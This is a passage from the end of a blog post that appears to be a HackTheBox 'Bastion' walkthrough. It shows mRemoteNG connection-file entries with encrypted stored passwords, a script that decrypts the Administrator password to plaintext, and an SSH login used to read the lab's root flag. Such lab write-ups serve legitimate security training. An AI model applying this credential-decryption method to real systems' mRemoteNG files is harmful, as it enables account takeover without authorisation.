RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" /> <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" /> </mrng:Connections> ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ Examine the confCons.xml we get the following information <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" The password is base64 but we are not able to read, the documentation says about script that does this magic for mRemoteNG ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ python3 mremoteNG.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" 130 ⨯ Password: thXLHM96BeKL0ER2 Now we have admin password, lets get root flag. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ ssh administrator@bastion.htb 1 ⨯ administrator@bastion.htb's password: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. administrator@BASTION C:UsersAdministrator>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:UsersAdministrator 25-04-2019 06:08 <DIR> . 25-04-2019 06:08 <DIR> .. 23-02-2019 10:40 <DIR> Contacts 23-02-2019 10:40 <DIR> Desktop 23-02-2019 10:40 <DIR> Documents 23-02-2019 10:40 <DIR> Downloads 23-02-2019 10:40 <DIR> Favorites 23-02-2019 10:40 <DIR> Links 23-02-2019 10:40 <DIR> Music 23-02-2019 10:40 <DIR> Pictures 23-02-2019 10:40 <DIR> Saved Games 23-02-2019 10:40 <DIR> Searches 23-02-2019 10:40 <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 11.295.739.904 bytes free administrator@BASTION C:UsersAdministrator>cd desktop administrator@BASTION C:UsersAdministratorDesktop>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:UsersAdministratorDesktop 23-02-2019 10:40 <DIR> . 23-02-2019 10:40 <DIR> .. 23-02-2019 10:07 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 11.295.739.904 bytes free administrator@BASTION C:UsersAdministratorDesktop>type root.txt 958850b91811676ed6620a9c430e65c8 administrator@BASTION C:UsersAdministratorDesktop> We will try to include topics of learning for each writeup going forward, and update same here too. [*] [*]Source link Matteo | September 13, 2021 at 9:10 am | Tags: Bastion, Ethical, Hacking, HackTheBox, Writeup | Categories: Hacker News | URL: https://wp.me/pcAtNR-2ZP Comment    See all comments Unsubscribe to no longer receive posts from Matteo Sala. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://salamatteo.com/2021/09/13/hackthebox-bastion-writeup-ethical-hacking/